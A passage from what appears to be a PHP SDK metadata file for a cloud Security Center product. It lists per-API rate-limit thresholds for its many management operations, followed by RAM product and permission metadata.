'DescribeSearchCondition'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DisableBruteForceRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAegisContainerPluginRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUserDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUniRestorePlan'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckCountStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulTargetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateBaselineCheckWhiteRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMonitorAccounts'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateHybridProxyCluster'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClientRatioStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitCheck'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyConcernNecessity'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceCatalog'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateK8s'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeQuaraFileDownloadInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListBaselineCheckWhiteRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAccessKeyLeakDeal'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateJenkinsImageRegistry'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHcExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BindAuthToMachine'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTraceInfoDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedStatisticsDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSasTrial'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVpcList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableBruteForceRecord'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUninstallAegisMachines'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceRebootStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GrantSwitchAgreement'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyIdcProbe'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateVuls'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategies'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulMetaCountStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAccountsInResourceDirectory'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckInstanceResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteFileProtectRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessMaliciousFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFunctionTrialStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckTypes'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCloudVendorAccountAK'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCommonSwitchConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateServiceLinkedRole'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddBaselineCheckWhiteRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportSuspEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogShipperStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetImageBuildRiskStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonOverallConfigList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogMeta'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGroupedSecurityEventMarkMissList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInterceptionRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAssetSelectionConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudVendorAccountAKList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarSubscribedStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageEventOperationPage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallUniBackupAgent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyPortDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAutoDelConfig'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileUploadLimit'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleMaliciousFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckPolicies'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMatchedMaliciousNames'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExcludeSystemPath'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckSecurityEventId'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOssScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateRegistryType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllRegionsStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateDynamicDict'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeCheckCustomConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOfflineMachines'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedTags'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSupportRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupPolicies'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFixUsedCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventOperationStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationCustomizeReportChart'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCountScannedImage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVulGlobalConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOssScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryGroupIdByGroupName'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectApiInvokeInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyUniBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLatestScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListLogShipperRegions'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudCenterInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDynamicDictUploadInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterImageList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMachineApps'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLogMetaStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallBackupClient'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRiskUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBaselineCheckWhiteRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeAssetRefreshTaskConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCloudVendorAccountAK'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientConfStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMaliciousFileWhitelistConfigs'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientAlertMode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServerlessAppAuthDetail'], ['threshold' => '35', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeChartData'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchDeleteMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniRecoverableList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetsScaProcessNum'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCronItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageListByBuildRisk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallHybridProxy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientProblemType'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskParams'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEmgVulItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyOpenLogShipper'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyProcDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockTotalFileChangeCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectEventStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScanTaskProgress'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSoarStrategyTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceVulStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectEventCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSimilarSecurityEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBinarySecurityPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ValidateHcWarnings'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCriteriaStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyRiskSingleResultStatus'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAppNetwork'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstallCodeForUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCloudVendorTrialConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeMachineCanReboot'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeNoticeConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddInstallCode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetSchemas'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageFixTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBackupStorageCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ReceiveFunctionTrialRewardByAliUid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonTargetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageVulWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSuspEventNode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterNetwork'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityStatInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAegisForLingjunStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveWhiteListStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetBuildRiskDefineRuleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceStatistics'], ], 'product' => ['code' => 'sas', 'title' => 'Sas'], ], 'ram' => [ 'productCode' => 'ThreatDetection', 'productName' => 'Security Center', 'ramCodes' => ['threatdetection', 'yundun-aegis', 'yundun-sas'], 'ramLevel' => 'SERVICE', 'ramConditions' => [ [ 'name' => 'acs:ResourceGroupId', 'schema' => ['type' => 'String', 'description' => '资源组ID'], ], ], 'ramActions' => [], 'resourceTypes' => [], ], ];